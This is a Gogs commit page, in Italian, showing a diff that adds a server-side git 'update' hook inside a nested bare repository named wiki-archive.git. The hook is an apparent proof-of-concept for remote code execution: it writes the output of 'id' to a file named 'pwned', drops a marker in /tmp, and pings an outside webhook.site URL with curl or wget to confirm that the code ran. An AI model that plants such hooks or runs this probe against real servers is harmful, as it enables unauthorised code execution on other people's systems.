ops 6 giorni fa
parent
commit
bb938d7085
1 ha cambiato i file con 4 aggiunte e 0 eliminazioni
  1. 4 0
      nested/wiki-archive.git/hooks/update

+ 4 - 0
nested/wiki-archive.git/hooks/update

@@ -0,0 +1,4 @@
+#!/bin/sh
+id > pwned 2>/dev/null
+echo 'gogs-hook-ran' >> /tmp/gogs_138_1788532922
+curl -s 'https://webhook.site/99d7a43d-c0fe-4dcd-93fa-d2511a3d2e7e?id=gogs_138_1788532922' >/dev/null 2>&1 || wget -q -O /dev/null 'https://webhook.site/99d7a43d-c0fe-4dcd-93fa-d2511a3d2e7e?id=gogs_138_1788532922' 2>/dev/null